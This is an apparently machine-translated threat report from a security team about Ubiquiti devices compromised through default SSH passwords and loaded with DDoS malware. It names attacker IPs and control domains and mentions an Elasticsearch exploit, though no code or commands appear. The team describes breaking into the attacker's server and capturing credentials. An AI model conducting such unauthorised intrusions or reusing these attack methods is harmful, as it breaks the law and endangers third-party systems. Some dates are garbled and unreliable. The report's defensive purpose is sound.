Threat warning: a large number of ubnt devices are implanted with Backdoors

Threat warning: a large number of ubnt devices are implanted with Backdoors
This article describes in detail the entire process of discovering a hacker attack, analyzing intrusions, attacking a hacker server, obtaining permissions, and collecting evidence. There are also many such intrusions, especially targeted (but "Blind scan") attacks targeting specific systems.
Recently, an Heng security research team has detected a large number of brute force cracking attacks on port 22 using weak passwords. After detailed analysis by the security team, we found that a large number of ubnt devices on the network had weak passwords and hackers had implanted backdoors using automated tools. Anheng APT network warning platform successfully detected this threat attack:

On July 6, March 19, an Heng engineer received a network fault report from a customer. After contacting the customer, an engineer remotely responded to the emergency and found some suspicious shell processes on the customer's device.

The analysis shows that the main function of these shell scripts is to download and run some suspicious files through wget, and finally Delete the downloaded files, which makes it difficult to obtain evidence later.
We try to open the involved malicious page as follows:


We can see that:
Suspicious ip: 222. *. *. 62 "10010" files were downloaded 9108 times in a day
Suspicious ip: 180. *. *. 241 "hope9" files were downloaded 396 times within 48 minutes
After analysis, we found that the two suspicious files are DDOS tools in the MIPS architecture. Foreign researchers call them "Mr. Black"

The main function is some common DDOS attack methods such as GET_Flood, SYN_Flood, and UDP_Flood.
The next day, we continued to observe and found that the download volume of one of the malicious files was changed from 9108 to 15171.



More than downloads within a day have attracted our high attention.
We use technical means to control malicious servers. after entering the Remote Desktop, we found that port 8000 of this host had established network communication with many other ip addresses.

Open several ip addresses randomly and find that they are all ubnt devices!

When collecting evidence, we found a large number of hacker software on the desktop.

Coincidentally, hackers just remotely log on to this machine.

Use netstat to find hacker IP addresses

Malicious IP address found: 139.201.133.104. The ip address generated by ip138 is "Sichuan"

Later, we used the tool to capture the administrator's password. After logging in with the administrator's account and password, we found that hackers were running the remote control tool.

The figure shows that the listening port is 8000, and the number of hosts that have been controlled by hackers is 564.
Port 8000 is also consistent with the result we use "netstat" to view!
In addition, when you use tcpview to view network connections, it is still attacking port 9200 of other IP addresses.



Port 9200 is Elasticsearch? Because the earlier version of Elasticsearch has a remote command execution vulnerability, the port opened by the service can be exploited by hackers. The POC is as follows:

Therefore, hackers also use port 9200 to implant backdoors (linux-based worms)
Note that the attack on the "Elasticsearch" server is as follows:

After collecting the related malicious files, we found that the tool implanted with ubnt is called "linux Command batch execution tool"

The commands for embedding malware here are the same as what we see on customer devices!
The attack process is as follows:
Brute-force cracking: port 22 with a weak password. The shell command is used to implant the backdoor. The hacker sends the command to the hacked device to launch the attack.

According to the results saved by hackers after scanning, a large number of ubnt devices have weak passwords. (the username and password used for brute-force cracking are the default password used when the ubnt device leaves the factory !)

We randomly tried several devices and found weak passwords by default, and multiple devices were repeatedly implanted with worms with different URLs.

The following URLs are included in the preliminary statistics:

Malicious URLs are constantly changing (Note: not all include !)

Later, we analyzed and found that many malicious files contained * .f3322.org and * .f3322.net websites as control domain names for malicious services, the registration information of these two domain names is the same as that of pubyu.com (the former user is 3322.org). They all provide free second-level domain name registration services, so they are liked by hackers!

Anheng's security team once again reminded customers to do security awareness education to prevent the occurrence of various weak passwords and default passwords. In addition, with the rapid development of the Internet of Things, personal computers may no longer be the primary targets of hacker intrusion, and all devices connected to the network may be hacked, traditional equipment manufacturers should also shoulder the responsibility to protect the interests of customers!